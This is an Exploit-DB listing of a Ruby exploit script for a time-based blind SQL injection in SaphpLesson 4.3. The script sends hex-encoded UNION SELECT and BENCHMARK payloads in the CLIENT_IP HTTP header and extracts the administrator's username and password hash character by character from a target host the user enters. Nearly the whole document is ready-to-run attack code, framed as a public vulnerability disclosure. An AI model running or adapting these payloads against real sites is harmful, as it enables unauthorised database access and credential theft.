SaphpLesson 4.3 - Blind SQL Injection

EDB-ID:

9700


Platform:

PHP

Published:

2009-09-16

#!/usr/bin/ruby

#=============================================#
#          SaphpLesson v4.3 Exploit           #
#     Blind SQL Injection Vulnerability       #
#---------------------------------------------#
# Date: 21-08-2009                            #
# Discovered & written by: Jafer Al Zidjali   #
# Email: jafer[at]scorpionds.com              #
# Website: www.scorpionds.com                 #
#---------------------------------------------#
# Notes:                                      #
#       1. Author has been notified           #
#       2. A public patch has been released   #
#=============================================#


require "net/http"
require "base64"

intro=[
          "+=============================================+",
          "+          SaphpLesson v4.3 Exploit           +",
          "+     Blind SQL Injection Vulnerability       +",
          "+  Discovered & written by: Jafer Al Zidjali  +",
          "+        Email: jafer[at]scorpionds.com       +",
          "+         Website: www.scorpionds.com         +",
          "+=============================================+"
          ]

def print_intro text
  w="|"
  text.each do |str|
    str.scan(/./) do |c|
        STDOUT.flush
      if w=="|" 
        print "\b"+c +w
        w="/"
      elsif w=="/" 
        print "\b"+c +w
        w="-"  
      elsif w=="-" 
        print "\b"+c +w
        w="\\" 
      else
      print "\b"+c +w
      w="|"
      end
      sleep 0.04
    end
    print "\b "
    puts ""
  end
end

print_intro intro

puts "\nEnter host name (e.g. example.com):"
host=gets.chomp

puts "\nEnter script path (e.g. /saphplesson/):"
path=gets.chomp


puts "\nGetting average response time..."

avgTime=Array.new(5)

5.times do |c|
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path)
  w=resp.body
  avgTime[c]=Time.now-s
  puts avgTime[c]
end

sum=0
5.times {|c| sum+=avgTime[c]}
avg=sum/5.0
puts "Average response time is: #{avg*3.0}"

puts "\nTesting delayed response time..."
delTime=Array.new(5)

5.times do |t|
  delay=1000000*((t+1)*10)
  header={
  "CLIENT_IP" =>  "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+
                  "\x20\x49\x46\x28\x31\x3d\x31\x2c\x42\x45\x4e\x43\x48\x4d"+
                  "\x41\x52\x4b\x28#{delay}\x2c\x63\x68\x61\x72\x28\x63\x68"+
                  "\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s
  delTime[t]=delay
  puts "["+(t+1).to_s+"] #{s}"
end

puts "\nChoose a delyed response time (it should be > average response time):"
sel=gets.chomp

print "\nGetting username length"
ulen=0

20.times do |z|
  header={
  "CLIENT_IP" =>  "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+
                  "\x20\x49\x46\x28\x6c\x65\x6e\x67\x74\x68\x28\x28\x73\x65\x6c\x65\x63\x74"+
                  "\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f\x6d\x20\x6d\x6f\x64\x72"+
                  "\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20\x4d\x6f\x64\x49\x44\x3d\x31"+
                  "\x29\x29\x3d#{z+1}\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+
                  "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s
  print "."
    if (s>(avg*3.0))
      ulen=z+1
      break;
    end
  STDOUT.flush
end

puts "\n\nUsername length: "+ ulen.to_s

puts "\n\nUsername: "
chars="abcdefghijklmnopqrstuvwxyz0123456789"

ulen.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43"+
    "\x54\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73"+
    "\x65\x6c\x65\x63\x74\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f"+
    "\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20"+
    "\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27"+
    "\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+
    "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33"+
    "\x34\x33\x34\x29\x20\x23\x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))
        break;
      end
    print "\b"
    STDOUT.flush
  end
end

puts "\n\nPassword hash: "
chars="0123456789abcdef"

32.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+
    "\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73\x65\x6c"+
    "\x65\x63\x74\x20\x4d\x6f\x64\x50\x61\x73\x73\x77\x6f\x72\x64\x20\x66\x72"+
    "\x6f\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20"+
    "\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27\x2c"+
    "\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+
    "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34"+
    "\x33\x34\x29\x20\x23\x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))
        break;
      end
    print "\b"
    STDOUT.flush
  end
end

# milw0rm.com [2009-09-16]